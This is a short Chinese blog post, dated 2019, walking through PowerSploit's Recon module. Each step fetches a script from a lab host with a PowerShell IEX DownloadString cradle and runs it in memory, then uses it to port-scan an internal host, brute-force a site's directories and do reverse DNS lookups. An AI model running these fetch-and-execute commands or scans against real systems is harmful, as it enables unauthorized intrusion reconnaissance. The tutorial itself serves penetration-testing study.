POWERSPLOIT-Recon(資訊偵察)腳本滲透實戰
Recon(資訊偵察)子產品
a) 調用invoke-Portscan掃描内網主機的端口。
1)通過IEX下載下傳并調用invoke-portscan。
PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke
-Portscan.ps1")
PS C:\Users\Administrator> Invoke-Portscan -Hosts 192.168.190.132 -Ports "1-65535"
b) 調用Get-HttpStatus掃描目标站點的目錄。
1)通過IEX下載下傳并調用Get-HttpStatus。
PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Get-Ht
tpStatus.ps1")
PS C:\Users\Administrator> Get-HttpStatus -Target www.xxx.com -Path D:\dic.txt
c) 調用Invoke-ReverseDnsLookup掃描内網主機的ip對應的主機名。
1)通過IEX下載下傳并調用Invoke-ReverseDnsLookup。
PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke
-ReverseDnsLookup.ps1")
PS C:\Users\Administrator> Invoke-ReverseDnsLookup '192.168.190.133'
posted @ 2019-03-16 20:47 卿先生 閱讀(...) 評論(...) 編輯 收藏